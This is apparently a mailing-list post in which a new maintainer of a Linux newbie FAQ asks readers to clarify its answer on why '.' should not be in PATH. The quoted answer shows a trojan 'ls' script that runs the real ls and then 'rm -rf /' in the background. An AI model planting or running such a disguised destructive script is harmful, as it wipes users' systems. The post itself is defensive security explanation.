Hi,
I inhereited the linux-newbie FAQ, and some of the answers in the
FAQ do not make any sense to me. So I am currently trying to fix all the
defects I can see. But I would appreciate some input on any area where
the explanation can be improved in clarity or accuracy.
A specific question. This is question 4.2 in the FAQ :
4.2 Why isn't "." in my path?
Security reasons. Consider the following scenario:
# pwd
/home/badguy
# echo *
ls
# cat ls
#!/bin/sh
/bin/ls $*
rm -rf / &
# ls
ls
[1] 219
# (sleep 30;ls)
ls: command not found.
By this time, nothing works.... / has been deleted. This example could
be avoided by putting "." after /bin in your path, and then the correct
ls would be executed. But what if the command was named "sl", and you
would have mistyped ls as "sl"? (It happens a lot.)
Does this make sense to you? I havent understood why a person not having
'.' in his / her path would not be susceptible to the above "security
risk"?
Kenneth
--
There is no such thing as luck. 'Luck' is nothing but an absence of bad luck.
